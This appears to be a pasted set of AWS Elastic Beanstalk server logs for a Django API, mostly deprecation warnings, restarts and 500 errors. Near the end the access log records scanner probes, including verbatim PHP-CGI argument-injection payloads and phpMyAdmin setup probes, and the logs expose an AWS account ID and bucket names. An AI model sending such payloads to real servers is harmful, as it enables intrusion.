Advertisement
Guest User

Untitled

a guest
Jul 21st, 2015
408
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 59.63 KB | None | 0 0
  1. -------------------------------------
  2. /var/log/eb-version-deployment.log
  3. -------------------------------------
  4. 2015-07-03 17:11:29,522 [INFO] Found the latest version manifest file <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/versions/manifest_1435943336606> from bucket elasticbeanstalk-us-east-1-049533541759 and prefix resources/environments/e-wha7kux2np/_runtime/versions/
  5. 2015-07-03 17:11:29,574 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  6. 2015-07-03 17:11:29,697 [INFO] Downloaded version label dash-api-dev-v0.1.0-b6 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b6>
  7. 2015-07-03 17:14:43,453 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1435943679503
  8. 2015-07-03 17:14:43,513 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  9. 2015-07-03 17:14:43,623 [INFO] Downloaded version label dash-api-dev-v0.1.0-b8 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b8>
  10. 2015-07-03 17:38:23,595 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1435945099070
  11. 2015-07-03 17:38:23,649 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  12. 2015-07-03 17:38:23,833 [INFO] Downloaded version label dash-api-dev-v0.1.0-b9 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b9>
  13. 2015-07-17 19:57:52,927 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1437163068875
  14. 2015-07-17 19:57:52,988 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  15. 2015-07-17 19:57:53,160 [INFO] Downloaded version label dash-api-dev-v0.1.0-b10 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b10>
  16. 2015-07-20 13:41:42,245 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1437399657811
  17. 2015-07-20 13:41:42,301 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  18. 2015-07-20 13:41:42,388 [INFO] Downloaded version label dash-api-dev-v0.1.0-b11 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b11>
  19. 2015-07-20 17:32:36,139 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1437413529177
  20. 2015-07-20 17:32:36,202 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  21. 2015-07-20 17:32:36,296 [INFO] Downloaded version label dash-api-dev-v0.1.0-b13 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b13>
  22. 2015-07-21 19:37:20,089 [INFO] Version manifest file name already known. The latest version manifest file key is resources/environments/e-wha7kux2np/_runtime/versions/manifest_1437507411432
  23. 2015-07-21 19:37:20,157 [INFO] Downloaded the manifest file to /tmp/version_file_manifest
  24. 2015-07-21 19:37:20,245 [INFO] Downloaded version label dash-api-dev-v0.1.0-b14 from s3 key <Key: elasticbeanstalk-us-east-1-049533541759,resources/environments/e-wha7kux2np/_runtime/_versions/loyfy-api/dash-api-dev-v0.1.0-b14>
  25.  
  26.  
  27.  
  28. -------------------------------------
  29. /opt/python/log/httpd.out
  30. -------------------------------------
  31. [Fri Jul 03 17:12:42.571030 2015] [so:warn] [pid 3739] AH01574: module wsgi_module is already loaded, skipping
  32. [Fri Jul 03 17:14:50.940111 2015] [so:warn] [pid 3982] AH01574: module wsgi_module is already loaded, skipping
  33. [Fri Jul 03 17:38:30.885451 2015] [so:warn] [pid 4399] AH01574: module wsgi_module is already loaded, skipping
  34. [Fri Jul 17 19:58:00.436444 2015] [so:warn] [pid 13647] AH01574: module wsgi_module is already loaded, skipping
  35.  
  36.  
  37.  
  38. -------------------------------------
  39. /var/log/httpd/error_log
  40. -------------------------------------
  41. [Fri Jul 03 17:12:45.775782 2015] [:error] [pid 3740]
  42. [Fri Jul 03 17:12:45.932352 2015] [:error] [pid 3740] /opt/python/run/venv/lib/python2.7/site-packages/rest_framework/settings.py:23: RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
  43. [Fri Jul 03 17:12:45.932376 2015] [:error] [pid 3740] from django.utils import importlib, six
  44. [Fri Jul 03 17:12:45.932382 2015] [:error] [pid 3740]
  45. [Fri Jul 03 17:12:45.963660 2015] [:error] [pid 3740] Connection Queries: 0
  46. [Fri Jul 03 17:14:49.845598 2015] [mpm_prefork:notice] [pid 3739] AH00169: caught SIGTERM, shutting down
  47. [Fri Jul 03 17:14:50.944756 2015] [suexec:notice] [pid 3982] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  48. [Fri Jul 03 17:14:50.952451 2015] [so:warn] [pid 3982] AH01574: module wsgi_module is already loaded, skipping
  49. [Fri Jul 03 17:14:50.954150 2015] [auth_digest:notice] [pid 3982] AH01757: generating secret for digest authentication ...
  50. [Fri Jul 03 17:14:50.954699 2015] [lbmethod_heartbeat:notice] [pid 3982] AH02282: No slotmem from mod_heartmonitor
  51. [Fri Jul 03 17:14:50.956476 2015] [mpm_prefork:notice] [pid 3982] AH00163: Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 configured -- resuming normal operations
  52. [Fri Jul 03 17:14:50.956494 2015] [core:notice] [pid 3982] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'
  53. [Fri Jul 03 17:14:54.137843 2015] [:error] [pid 3983] /opt/python/run/venv/lib/python2.7/site-packages/corsheaders/middleware.py:10: RemovedInDjango19Warning: The utilities in django.db.models.loading are deprecated in favor of the new application loading system.
  54. [Fri Jul 03 17:14:54.137884 2015] [:error] [pid 3983] from django.db.models.loading import get_model
  55. [Fri Jul 03 17:14:54.137887 2015] [:error] [pid 3983]
  56. [Fri Jul 03 17:14:54.204252 2015] [:error] [pid 3983] /opt/python/run/venv/lib/python2.7/site-packages/rest_framework/settings.py:23: RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
  57. [Fri Jul 03 17:14:54.204271 2015] [:error] [pid 3983] from django.utils import importlib, six
  58. [Fri Jul 03 17:14:54.204274 2015] [:error] [pid 3983]
  59. [Fri Jul 03 17:14:54.235164 2015] [:error] [pid 3983] Connection Queries: 0
  60. [Fri Jul 03 17:38:29.789340 2015] [mpm_prefork:notice] [pid 3982] AH00169: caught SIGTERM, shutting down
  61. [Fri Jul 03 17:38:30.891448 2015] [suexec:notice] [pid 4399] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  62. [Fri Jul 03 17:38:30.900464 2015] [so:warn] [pid 4399] AH01574: module wsgi_module is already loaded, skipping
  63. [Fri Jul 03 17:38:30.902317 2015] [auth_digest:notice] [pid 4399] AH01757: generating secret for digest authentication ...
  64. [Fri Jul 03 17:38:30.902911 2015] [lbmethod_heartbeat:notice] [pid 4399] AH02282: No slotmem from mod_heartmonitor
  65. [Fri Jul 03 17:38:30.904874 2015] [mpm_prefork:notice] [pid 4399] AH00163: Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 configured -- resuming normal operations
  66. [Fri Jul 03 17:38:30.904893 2015] [core:notice] [pid 4399] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'
  67. [Fri Jul 03 17:38:34.109133 2015] [:error] [pid 4400] /opt/python/run/venv/lib/python2.7/site-packages/corsheaders/middleware.py:10: RemovedInDjango19Warning: The utilities in django.db.models.loading are deprecated in favor of the new application loading system.
  68. [Fri Jul 03 17:38:34.109173 2015] [:error] [pid 4400] from django.db.models.loading import get_model
  69. [Fri Jul 03 17:38:34.109176 2015] [:error] [pid 4400]
  70. [Fri Jul 03 17:38:34.177207 2015] [:error] [pid 4400] /opt/python/run/venv/lib/python2.7/site-packages/rest_framework/settings.py:23: RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
  71. [Fri Jul 03 17:38:34.177230 2015] [:error] [pid 4400] from django.utils import importlib, six
  72. [Fri Jul 03 17:38:34.177233 2015] [:error] [pid 4400]
  73. [Fri Jul 03 17:38:34.208712 2015] [:error] [pid 4400] Connection Queries: 0
  74. [Fri Jul 03 19:14:09.282686 2015] [:error] [pid 4400] Connection Queries: 13
  75. [Fri Jul 03 19:14:34.738735 2015] [:error] [pid 4400] Connection Queries: 13
  76. [Fri Jul 03 19:14:46.305139 2015] [:error] [pid 4400] Connection Queries: 13
  77. [Mon Jul 06 11:37:23.841126 2015] [:error] [pid 4400] 1
  78. [Mon Jul 06 11:38:23.921855 2015] [:error] [pid 4400] Connection Queries: 14
  79. [Mon Jul 06 13:54:35.851777 2015] [:error] [pid 4400] 1
  80. [Mon Jul 06 13:54:50.994982 2015] [:error] [pid 4400] Connection Queries: 13
  81. [Mon Jul 06 14:01:17.201909 2015] [:error] [pid 4400] Connection Queries: 13
  82. [Mon Jul 06 14:01:41.529883 2015] [:error] [pid 4400] Connection Queries: 13
  83. [Mon Jul 06 14:03:39.565482 2015] [:error] [pid 4400] 1
  84. [Mon Jul 06 14:03:54.553001 2015] [:error] [pid 4400] Connection Queries: 13
  85. [Mon Jul 06 14:06:34.957687 2015] [:error] [pid 4400] Connection Queries: 13
  86. [Mon Jul 06 14:09:37.845662 2015] [:error] [pid 4400] Connection Queries: 13
  87. [Mon Jul 06 14:09:55.572327 2015] [:error] [pid 4400] Connection Queries: 13
  88. [Mon Jul 06 14:10:34.291908 2015] [:error] [pid 4400] Connection Queries: 13
  89. [Mon Jul 06 14:11:22.496133 2015] [:error] [pid 4400] Connection Queries: 13
  90. [Mon Jul 06 14:11:54.786703 2015] [:error] [pid 4400] Connection Queries: 13
  91. [Mon Jul 06 14:14:58.475611 2015] [:error] [pid 4400] Connection Queries: 13
  92. [Mon Jul 06 14:15:34.614827 2015] [:error] [pid 4400] Connection Queries: 13
  93. [Mon Jul 06 14:18:11.603116 2015] [:error] [pid 4400] Connection Queries: 13
  94. [Mon Jul 06 14:23:59.284089 2015] [:error] [pid 4400] Connection Queries: 13
  95. [Mon Jul 06 14:24:23.340794 2015] [:error] [pid 4400] Connection Queries: 13
  96. [Mon Jul 06 14:27:31.734066 2015] [:error] [pid 4400] Connection Queries: 13
  97. [Mon Jul 06 14:27:36.485592 2015] [:error] [pid 4400] Connection Queries: 13
  98. [Mon Jul 06 14:27:40.222063 2015] [:error] [pid 4400] Connection Queries: 13
  99. [Mon Jul 06 15:23:11.091741 2015] [:error] [pid 4400] Connection Queries: 13
  100. [Mon Jul 06 15:49:24.823726 2015] [:error] [pid 4400] Connection Queries: 13
  101. [Mon Jul 06 15:49:46.109542 2015] [:error] [pid 4400] Connection Queries: 13
  102. [Tue Jul 07 17:54:24.427276 2015] [:error] [pid 4400] 1
  103. [Tue Jul 07 18:44:59.068156 2015] [:error] [pid 4400] 1
  104. [Tue Jul 07 18:45:18.561065 2015] [:error] [pid 4400] Connection Queries: 5
  105. [Tue Jul 07 18:45:19.872444 2015] [:error] [pid 4400] 8
  106. [Tue Jul 07 18:45:19.872480 2015] [:error] [pid 4400] [1]
  107. [Tue Jul 07 18:45:19.996087 2015] [:error] [pid 4400] Connection Queries: 3
  108. [Tue Jul 07 18:45:21.818663 2015] [:error] [pid 4400] Connection Queries: 5
  109. [Tue Jul 07 18:45:23.079772 2015] [:error] [pid 4400] 9
  110. [Tue Jul 07 18:45:23.079807 2015] [:error] [pid 4400] [1]
  111. [Tue Jul 07 18:45:23.202955 2015] [:error] [pid 4400] Connection Queries: 3
  112. [Sun Jul 12 19:48:35.766713 2015] [cgi:error] [pid 28993] [client 94.102.49.169:51311] AH02811: script not found or unable to stat: /var/www/cgi-bin/mft
  113. [Thu Jul 16 07:15:40.611725 2015] [cgi:error] [pid 26925] [client 69.64.46.86:65535] AH02811: script not found or unable to stat: /var/www/cgi-bin/rtpd.cgi
  114. [Thu Jul 16 12:21:37.105644 2015] [:error] [pid 4400] 1
  115. [Thu Jul 16 13:24:37.022714 2015] [:error] [pid 4400] 1
  116. [Thu Jul 16 16:01:39.156524 2015] [:error] [pid 4400] 1
  117. [Thu Jul 16 16:07:36.691175 2015] [:error] [pid 4400] 1
  118. [Fri Jul 17 19:57:59.340288 2015] [mpm_prefork:notice] [pid 4399] AH00169: caught SIGTERM, shutting down
  119. [Fri Jul 17 19:58:00.442434 2015] [suexec:notice] [pid 13647] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  120. [Fri Jul 17 19:58:00.450768 2015] [so:warn] [pid 13647] AH01574: module wsgi_module is already loaded, skipping
  121. [Fri Jul 17 19:58:00.452454 2015] [auth_digest:notice] [pid 13647] AH01757: generating secret for digest authentication ...
  122. [Fri Jul 17 19:58:00.453022 2015] [lbmethod_heartbeat:notice] [pid 13647] AH02282: No slotmem from mod_heartmonitor
  123. [Fri Jul 17 19:58:00.454980 2015] [mpm_prefork:notice] [pid 13647] AH00163: Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 configured -- resuming normal operations
  124. [Fri Jul 17 19:58:00.455002 2015] [core:notice] [pid 13647] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'
  125. [Fri Jul 17 19:58:03.676335 2015] [:error] [pid 13648] /opt/python/run/venv/lib/python2.7/site-packages/corsheaders/middleware.py:10: RemovedInDjango19Warning: The utilities in django.db.models.loading are deprecated in favor of the new application loading system.
  126. [Fri Jul 17 19:58:03.676375 2015] [:error] [pid 13648] from django.db.models.loading import get_model
  127. [Fri Jul 17 19:58:03.676378 2015] [:error] [pid 13648]
  128. [Fri Jul 17 19:58:03.746963 2015] [:error] [pid 13648] /opt/python/run/venv/lib/python2.7/site-packages/rest_framework/settings.py:23: RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
  129. [Fri Jul 17 19:58:03.747002 2015] [:error] [pid 13648] from django.utils import importlib, six
  130. [Fri Jul 17 19:58:03.747006 2015] [:error] [pid 13648]
  131. [Sat Jul 18 05:27:55.480704 2015] [cgi:error] [pid 13649] [client 31.192.108.62:43413] AH02811: script not found or unable to stat: /var/www/cgi-bin/php.cgi
  132. [Sat Jul 18 05:27:56.443504 2015] [cgi:error] [pid 13676] [client 31.192.108.62:54542] AH02811: script not found or unable to stat: /var/www/cgi-bin/php-cgi
  133. [Sat Jul 18 05:27:56.493465 2015] [cgi:error] [pid 13651] [client 31.192.108.62:55144] AH02811: script not found or unable to stat: /var/www/cgi-bin/php4
  134. [Sat Jul 18 05:27:56.530520 2015] [cgi:error] [pid 13650] [client 31.192.108.62:55661] AH02811: script not found or unable to stat: /var/www/cgi-bin/php
  135. [Sat Jul 18 05:27:56.578518 2015] [cgi:error] [pid 13652] [client 31.192.108.62:56111] AH02811: script not found or unable to stat: /var/www/cgi-bin/php5
  136. [Sat Jul 18 14:15:45.663635 2015] [cgi:error] [pid 13651] [client 31.192.108.62:42687] AH02811: script not found or unable to stat: /var/www/cgi-bin/php4
  137. [Sat Jul 18 14:15:46.130635 2015] [cgi:error] [pid 13653] [client 31.192.108.62:42655] AH02811: script not found or unable to stat: /var/www/cgi-bin/php5
  138. [Sat Jul 18 14:15:46.355708 2015] [cgi:error] [pid 13649] [client 31.192.108.62:42679] AH02811: script not found or unable to stat: /var/www/cgi-bin/php.cgi
  139. [Sat Jul 18 14:15:46.473299 2015] [cgi:error] [pid 22779] [client 31.192.108.62:42670] AH02811: script not found or unable to stat: /var/www/cgi-bin/php-cgi
  140. [Sat Jul 18 14:15:47.463789 2015] [cgi:error] [pid 22781] [client 31.192.108.62:42646] AH02811: script not found or unable to stat: /var/www/cgi-bin/php
  141.  
  142.  
  143.  
  144. -------------------------------------
  145. /opt/python/log/supervisord.log
  146. -------------------------------------
  147. 2015-07-03 17:11:36,427 CRIT Supervisor running as root (no user in config file)
  148. 2015-07-03 17:11:36,444 INFO RPC interface 'supervisor' initialized
  149. 2015-07-03 17:11:36,444 CRIT Server 'unix_http_server' running without any HTTP authentication checking
  150. 2015-07-03 17:11:36,444 INFO supervisord started with pid 2416
  151. 2015-07-03 17:11:37,446 INFO spawned: 'httpd' with pid 2496
  152. 2015-07-03 17:11:38,447 INFO success: httpd entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
  153. 2015-07-03 17:12:41,534 INFO stopped: httpd (exit status 0)
  154. 2015-07-03 17:12:42,539 INFO spawned: 'httpd' with pid 3739
  155. 2015-07-03 17:12:43,572 INFO success: httpd entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
  156. 2015-07-03 17:14:49,904 INFO stopped: httpd (exit status 0)
  157. 2015-07-03 17:14:50,909 INFO spawned: 'httpd' with pid 3982
  158. 2015-07-03 17:14:51,941 INFO success: httpd entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
  159. 2015-07-03 17:38:29,848 INFO stopped: httpd (exit status 0)
  160. 2015-07-03 17:38:30,853 INFO spawned: 'httpd' with pid 4399
  161. 2015-07-03 17:38:31,886 INFO success: httpd entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
  162. 2015-07-17 19:57:59,399 INFO stopped: httpd (exit status 0)
  163. 2015-07-17 19:58:00,404 INFO spawned: 'httpd' with pid 13647
  164. 2015-07-17 19:58:01,437 INFO success: httpd entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
  165.  
  166.  
  167.  
  168. -------------------------------------
  169. /var/log/httpd/access_log
  170. -------------------------------------
  171. 189.114.202.242 (-) - - [16/Jul/2015:16:07:54 +0000] "GET /reports/participation/ HTTP/1.1" 404 31017 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  172. 189.114.202.242 (-) - - [16/Jul/2015:16:07:54 +0000] "GET /reports/cupomtotal/ HTTP/1.1" 404 31008 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  173. 189.114.202.242 (-) - - [16/Jul/2015:16:07:54 +0000] "GET /reports/participationtotal/ HTTP/1.1" 404 31032 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  174. 189.114.202.242 (-) - - [16/Jul/2015:16:07:54 +0000] "GET /reports/coupomregister/ HTTP/1.1" 404 31020 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  175. 141.212.122.90 (-) - - [16/Jul/2015:21:43:26 +0000] "GET /x HTTP/1.1" 400 226 "-" "Telesphoreo"
  176. 62.210.207.107 (-) - - [16/Jul/2015:21:59:01 +0000] "GET / HTTP/1.1" 401 58 "-" "-"
  177. 54.161.118.199 (-) - - [16/Jul/2015:23:00:02 +0000] "HEAD / HTTP/1.1" 401 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  178. 222.186.31.57 (-) - - [17/Jul/2015:07:34:02 +0000] "POST / HTTP/1.1" 401 58 "-" "Mozilla/5.0"
  179. 54.198.18.8 (-) - - [17/Jul/2015:15:02:28 +0000] "HEAD / HTTP/1.1" 401 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  180. 1.192.128.23 (-) - - [17/Jul/2015:15:29:32 +0000] "GET /manager/html HTTP/1.1" 404 30974 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
  181. 127.0.0.1 (-) - - [17/Jul/2015:19:58:03 +0000] "GET / HTTP/1.1" 500 109355 "-" "Python-urllib/2.7"
  182. 189.114.202.242 (-) - - [17/Jul/2015:20:18:49 +0000] "OPTIONS /api-token-auth/ HTTP/1.1" 200 - "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  183. 189.114.202.242 (-) - - [17/Jul/2015:20:18:49 +0000] "POST /api-token-auth/ HTTP/1.1" 500 111546 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  184. 189.114.202.242 (-) - - [17/Jul/2015:20:18:58 +0000] "OPTIONS /api-token-auth/ HTTP/1.1" 200 - "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  185. 189.114.202.242 (-) - - [17/Jul/2015:20:18:58 +0000] "POST /api-token-auth/ HTTP/1.1" 500 111546 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  186. 189.114.202.242 (-) - - [17/Jul/2015:20:21:28 +0000] "POST /api-token-auth/ HTTP/1.1" 500 111188 "http://adm.loyfy.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  187. 189.114.202.242 (-) - - [17/Jul/2015:20:21:49 +0000] "GET /api-token-auth/ HTTP/1.1" 500 111118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  188. 189.114.202.242 (-) - - [17/Jul/2015:20:21:50 +0000] "GET /favicon.ico HTTP/1.1" 500 126209 "http://dash-api.elasticbeanstalk.com/api-token-auth/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  189. 141.212.122.194 (-) - - [17/Jul/2015:20:34:23 +0000] "GET / HTTP/1.1" 500 108833 "-" "-"
  190. 185.25.151.159 (-) - - [17/Jul/2015:23:11:55 +0000] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 500 125094 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  191. 217.31.48.30 (-) - - [17/Jul/2015:23:31:24 +0000] "HEAD /rom-0 HTTP/1.1" 500 - "-" "Python-httplib2/0.9 (gzip)"
  192. 177.104.206.169 (-) - - [18/Jul/2015:05:21:10 +0000] "GET /Ringing.at.your.dorbell! HTTP/1.0" 500 125131 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"
  193. 177.104.206.169 (-) - - [18/Jul/2015:05:21:11 +0000] "GET / HTTP/1.0" 500 108935 "-" "x00_-gawa.sa.pilipinas.2015"
  194. 177.104.206.169 (-) - - [18/Jul/2015:05:21:15 +0000] "GET / HTTP/1.1" 500 110075 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"
  195. 177.104.206.169 (-) - - [18/Jul/2015:05:21:16 +0000] "GET /Diagnostics.asp HTTP/1.0" 500 123596 "-" "x00_-gawa.sa.pilipinas.2015"
  196. 177.104.206.169 (-) - - [18/Jul/2015:05:21:17 +0000] "GET / HTTP/1.0" 500 108935 "-" "x00_-gawa.sa.pilipinas.2015"
  197. 177.104.206.169 (-) - - [18/Jul/2015:05:21:17 +0000] "GET / HTTP/1.0" 500 108935 "-" "x00_-gawa.sa.pilipinas.2015"
  198. 177.104.206.169 (-) - - [18/Jul/2015:05:21:18 +0000] "GET / HTTP/1.0" 500 108935 "-" "x00_-gawa.sa.pilipinas.2015"
  199. 31.192.108.62 (-) - - [18/Jul/2015:05:27:55 +0000] "GET /cgi-bin/php.cgi HTTP/1.0" 404 213 "-" "-"
  200. 31.192.108.62 (-) - - [18/Jul/2015:05:27:56 +0000] "GET /cgi-bin/php-cgi HTTP/1.0" 404 213 "-" "-"
  201. 31.192.108.62 (-) - - [18/Jul/2015:05:27:56 +0000] "GET /cgi-bin/php4 HTTP/1.0" 404 210 "-" "-"
  202. 31.192.108.62 (-) - - [18/Jul/2015:05:27:56 +0000] "GET /cgi-bin/php HTTP/1.0" 404 209 "-" "-"
  203. 31.192.108.62 (-) - - [18/Jul/2015:05:27:56 +0000] "GET /cgi-bin/php5 HTTP/1.0" 404 210 "-" "-"
  204. 31.192.108.62 (-) - - [18/Jul/2015:05:27:59 +0000] "GET /local-bin/php5 HTTP/1.0" 500 123281 "-" "-"
  205. 31.192.108.62 (-) - - [18/Jul/2015:05:27:59 +0000] "GET /local-bin/php HTTP/1.0" 500 123258 "-" "-"
  206. 31.192.108.62 (-) - - [18/Jul/2015:05:27:59 +0000] "GET /phppath/php5 HTTP/1.0" 500 123235 "-" "-"
  207. 31.192.108.62 (-) - - [18/Jul/2015:05:27:59 +0000] "GET /phppath/php HTTP/1.0" 500 123212 "-" "-"
  208. 31.192.108.62 (-) - - [18/Jul/2015:05:28:01 +0000] "GET /index.php HTTP/1.0" 500 123166 "-" "-"
  209. 89.248.172.169 (-) - - [18/Jul/2015:08:41:33 +0000] "GET /muieblackcat HTTP/1.1" 500 124260 "-" "-"
  210. 89.248.172.169 (-) - - [18/Jul/2015:08:41:33 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 500 124631 "-" "-"
  211. 89.248.172.169 (-) - - [18/Jul/2015:08:41:33 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 500 124631 "-" "-"
  212. 89.248.172.169 (-) - - [18/Jul/2015:08:41:33 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 500 124562 "-" "-"
  213. 31.192.108.62 (-) - - [18/Jul/2015:14:15:45 +0000] "POST /cgi-bin/php4/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 404 211 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  214. 31.192.108.62 (-) - - [18/Jul/2015:14:15:46 +0000] "POST /cgi-bin/php5/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 404 211 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  215. 31.192.108.62 (-) - - [18/Jul/2015:14:15:46 +0000] "POST /cgi-bin/php.cgi/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 404 214 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  216. 31.192.108.62 (-) - - [18/Jul/2015:14:15:45 +0000] "POST /local-bin/php5/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 500 111876 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  217. 31.192.108.62 (-) - - [18/Jul/2015:14:15:45 +0000] "POST /local-bin/php/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 500 111861 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  218. 31.192.108.62 (-) - - [18/Jul/2015:14:15:46 +0000] "POST /cgi-bin/php-cgi/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 404 214 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  219. 31.192.108.62 (-) - - [18/Jul/2015:14:15:46 +0000] "POST /index.php/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 500 111801 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
